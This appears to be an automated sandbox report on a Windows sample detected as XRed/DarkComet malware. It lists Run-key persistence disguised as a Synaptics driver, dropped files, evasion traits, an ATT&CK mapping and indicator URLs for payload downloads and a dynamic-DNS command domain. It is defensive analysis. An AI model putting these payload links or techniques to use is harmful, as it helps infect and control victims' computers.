                          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeDropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeDropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dllJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeDropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\SET1013.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeDropped PE file which has not been started: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dllJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_2-3756
                          Source: C:\Users\user\Desktop\._cache_file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-3055
                          Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7704Thread sleep time: -60000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01001C7F lstrcpyA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcmpA,lstrcmpA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_01001C7F
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004B1A lstrcpyA,GetSystemInfo,lstrcpyA,CreateDirectoryA,RemoveDirectoryA,2_2_01004B1A
                          Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                          Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000734000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2701819372.0000000000734000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2183407168.0000000000D12000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2155521277.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2155297064.0000000000D12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: dxwsetup.exe, 00000004.00000003.2155521277.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw)
                          Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                          Source: C:\Users\user\Desktop\._cache_file.exeAPI call chain: ExitProcess graph end nodegraph_2-2861
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100198B LocalFree,RegCreateKeyExA,wsprintfA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetModuleFileNameA,RegCloseKey,wsprintfA,lstrlenA,RegSetValueExA,RegCloseKey,LocalFree,2_2_0100198B
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100168B GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,2_2_0100168B
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01005D22 GetVersionExA,GetSystemMetrics,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,2_2_01005D22

                          Stealing of Sensitive Information

                          barindex
                          Yara detected XRed
                          Source: Yara matchFile source: file.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7252, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXE9B.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected XRed
                          Source: Yara matchFile source: file.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7252, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXE9B.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information41
                          Scripting                          		2
                          Replication Through Removable Media                          		2
                          Native API                          		41
                          Scripting                          		1
                          Access Token Manipulation                          		32
                          Masquerading                          		OS Credential Dumping1
                          Query Registry                          		Remote Services1
                          Archive Collected Data                          		11
                          Encrypted Channel                          		Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          Registry Run Keys / Startup Folder                          		11
                          Process Injection                          		11
                          Virtualization/Sandbox Evasion                          		LSASS Memory11
                          Security Software Discovery                          		Remote Desktop ProtocolData from Removable Media3
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading                          		1
                          Registry Run Keys / Startup Folder                          		1
                          Access Token Manipulation                          		Security Account Manager1
                          Process Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          DLL Side-Loading                          		11
                          Process Injection                          		NTDS11
                          Virtualization/Sandbox Evasion                          		Distributed Component Object ModelInput Capture34
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                          Extra Window Memory Injection                          		1
                          DLL Side-Loading                          		LSA Secrets11
                          Peripheral Device Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          File Deletion                          		Cached Domain Credentials4
                          File and Directory Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Extra Window Memory Injection                          		DCSync15
                          System Information Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583475 Sample: file.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 74 52 freedns.afraid.org 2->52 54 xred.mooo.com 2->54 56 4 other IPs or domains 2->56 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Antivirus detection for URL or domain 2->68 72 13 other signatures 2->72 8 file.exe 1 6 2->8         started        11 EXCEL.EXE 2->11         started        13 Synaptics.exe 2->13         started        signatures3 70 Uses dynamic DNS services 52->70 process4 file5 28 C:\ProgramData\Synaptics\Synaptics.exe, PE32 8->28 dropped 30 C:\ProgramData\Synaptics\RCXE9B.tmp, PE32 8->30 dropped 32 C:\...\Synaptics.exe:Zone.Identifier, ASCII 8->32 dropped 34 C:\Users\user\Desktop\._cache_file.exe, PE32 8->34 dropped 15 ._cache_file.exe 1 7 8->15         started        18 Synaptics.exe 19 8->18         started        22 splwow64.exe 11->22         started        process6 dnsIp7 44 C:\Users\user\AppData\Local\...\dxwsetup.exe, PE32 15->44 dropped 46 C:\Users\user\AppData\Local\...\dsetup32.dll, PE32 15->46 dropped 48 C:\Users\user\AppData\Local\...\dsetup.dll, PE32 15->48 dropped 24 dxwsetup.exe 478 15->24         started        58 docs.google.com 142.250.184.238, 443, 50021, 50024 GOOGLEUS United States 18->58 60 drive.usercontent.google.com 142.250.185.97, 443, 50022, 50025 GOOGLEUS United States 18->60 62 freedns.afraid.org 69.42.215.252, 49710, 80 AWKNET-LLCUS United States 18->62 50 C:\Users\user\Documents\BJZFPPWAPT\~$cache1, PE32 18->50 dropped 74 Antivirus detection for dropped file 18->74 76 Multi AV Scanner detection for dropped file 18->76 78 Drops PE files to the document folder of the user 18->78 80 Machine Learning detection for dropped file 18->80 file8 signatures9 process10 file11 36 C:\Windows\SysWOW64\...\dsetup32.dll (copy), PE32 24->36 dropped 38 C:\Windows\SysWOW64\...\dsetup.dll (copy), PE32 24->38 dropped 40 C:\Windows\SysWOW64\directx\...\SETFF3.tmp, PE32 24->40 dropped 42 215 other files (214 malicious) 24->42 dropped 82 Writes many files with high entropy 24->82 signatures12

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe92%ReversingLabsWin32.Worm.Zorex
                          file.exe100%AviraTR/Dldr.Agent.SH
                          file.exe100%AviraW2000M/Dldr.Agent.17651006
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\ProgramData\Synaptics\RCXE9B.tmp100%AviraTR/Dldr.Agent.SH
                          C:\ProgramData\Synaptics\RCXE9B.tmp100%AviraW2000M/Dldr.Agent.17651006
                          C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                          C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                          C:\Users\user\Documents\BJZFPPWAPT\~$cache1100%AviraTR/Dldr.Agent.SH
                          C:\Users\user\Documents\BJZFPPWAPT\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                          C:\ProgramData\Synaptics\RCXE9B.tmp100%Joe Sandbox ML
                          C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                          C:\Users\user\Documents\BJZFPPWAPT\~$cache1100%Joe Sandbox ML
                          C:\ProgramData\Synaptics\RCXE9B.tmp94%ReversingLabsWin32.Backdoor.DarkComet
                          C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Worm.Zorex
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe0%ReversingLabs
                          C:\Users\user\Desktop\._cache_file.exe0%ReversingLabs
                          C:\Users\user\Documents\BJZFPPWAPT\~$cache194%ReversingLabsWin32.Backdoor.DarkComet
                          C:\Windows\SysWOW64\directx\websetup\SET1013.tmp0%ReversingLabs
                          C:\Windows\SysWOW64\directx\websetup\SETFF3.tmp0%ReversingLabs
                          C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)0%ReversingLabs
                          C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://drive.usercontent.go0%Avira URL Cloudsafe
                          http://xred.site50.net/syn/Synaptics.rarZ100%Avira URL Cloudmalware
                          http://www.betaplace.com.0%Avira URL Cloudsafe
                          http://xred.site50.net/syn/SUpdate.iniZ100%Avira URL Cloudmalware
                          http://xred.site50.net/syn/SSLLibrary.dll6100%Avira URL Cloudmalware
                          http://www.betaplace.com0%Avira URL Cloudsafe
                          http://www.BetaPlace.comEContinuare0%Avira URL Cloudsafe
                          http://www.BetaPlace.com.?0%Avira URL Cloudsafe
                          http://www.betaplace.com.DInstalacn0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          freedns.afraid.org
                          		69.42.215.252
                          		truefalse
                            		high
                            docs.google.com
                            		142.250.184.238
                            		truefalse
                              		high
                              s-part-0017.t-0009.t-msedge.net
                              		13.107.246.45
                              		truefalse
                                		high
                                drive.usercontent.google.com
                                		142.250.185.97
                                		truefalse
                                  		high
                                  xred.mooo.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    xred.mooo.comfalse
                                      		high
                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://docs.google.com/~Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://docs.google.com/google.com/taSynaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1file.exefalse
                                                		high
                                                https://drive.usercontent.goSynaptics.exe, 00000003.00000003.2723135790.0000000000784000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978n%Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://docs.google.com/.Synaptics.exe, 00000003.00000003.2733811856.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2745845136.000000000077D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000003.2745845136.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2723135790.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2733811856.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000777000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://xred.site50.net/syn/Synaptics.rarfile.exefalse
                                                          		high
                                                          http://xred.site50.net/syn/Synaptics.rarhfile.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.google.com/Synaptics.exe, 00000003.00000003.2733811856.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2745845136.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlXfile.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.BetaPlace.com.?._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://xred.site50.net/syn/SSLLibrary.dlDfile.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1file.exefalse
                                                                      		high
                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1~DF26C05A2AD06F381B.TMP.5.drfalse
                                                                        		high
                                                                        http://www.betaplace.com.DInstalacn._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://www.betaplace.com.._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2045818625.0000000000C84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://xred.site50.net/syn/SUpdate.inifile.exefalse
                                                                          		high
                                                                          http://www.betaplace.comdxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.BetaPlace.comEContinuare._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978W%Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978qSynaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978xfile.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.usercontent.google.com/qSynaptics.exe, 00000003.00000003.2745845136.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2723135790.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2733811856.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000777000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
